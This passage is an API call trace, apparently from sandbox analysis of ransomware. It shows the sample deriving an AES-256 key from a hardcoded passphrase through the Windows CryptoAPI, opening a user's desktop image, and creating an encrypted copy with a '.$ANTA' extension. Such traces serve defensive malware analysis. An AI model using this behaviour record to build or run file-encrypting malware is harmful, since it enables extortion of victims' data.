[0122.941] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0122.941] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\gp1QElBYzj-bWq.bmp", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabf40970, ftCreationTime.dwHighDateTime=0x1d5ec9f, ftLastAccessTime.dwLowDateTime=0xc4b9db30, ftLastAccessTime.dwHighDateTime=0x1d5e432, ftLastWriteTime.dwLowDateTime=0xc4b9db30, ftLastWriteTime.dwHighDateTime=0x1d5e432, nFileSizeHigh=0x0, nFileSizeLow=0x5ad5, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="gp1QElBYzj-bWq.bmp", cAlternateFileName="GP1QEL~1.BMP")) returned 0x41ac040 [0122.942] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0122.942] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.942] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.942] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0122.942] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.942] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0122.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0122.942] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0122.943] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0122.943] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.943] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0122.943] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.943] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.943] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.944] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.944] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.944] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca9a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0122.944] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0122.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0122.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0122.944] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0122.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0122.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0122.944] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.944] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caa18, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0122.944] CryptHashData (hHash=0x41ac500, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0122.945] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.945] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.945] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca9b8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0122.945] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac500, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac640) returned 1 [0122.945] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.945] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0122.945] CryptDestroyHash (hHash=0x41ac500) returned 1 [0122.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0122.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0122.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0122.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0122.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0122.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0122.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0122.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0122.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0122.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0122.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0122.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0122.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0122.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0122.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0122.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0122.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0122.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0122.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0122.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0122.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0122.946] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0122.946] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0122.948] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0122.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0122.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0122.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0122.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0122.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0122.949] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\gp1QElBYzj-bWq.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\gp1qelbyzj-bwq.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0122.949] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.949] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0122.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0122.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0122.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0122.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0122.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0122.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0122.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0122.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.949] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0122.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0122.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0122.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0122.950] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0122.950] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0122.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0122.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0122.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0122.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0122.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0122.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0122.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0122.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0122.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e310 [0122.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0122.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392298 [0122.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0122.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e310 | out: hHeap=0x1780000) returned 1 [0122.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0122.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392298 | out: hHeap=0x1780000) returned 1 [0122.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0122.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0122.952] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0122.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0122.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0122.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0122.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0122.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0122.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.953] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\gp1QElBYzj-bWq.bmp.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\gp1qelbyzj-bwq.bmp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0122.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0122.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0122.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0122.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0122.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0122.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.954] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0122.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0122.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0122.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0122.954] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0122.954] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0122.954] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0122.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0122.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0122.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0122.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0122.955] HeapFree 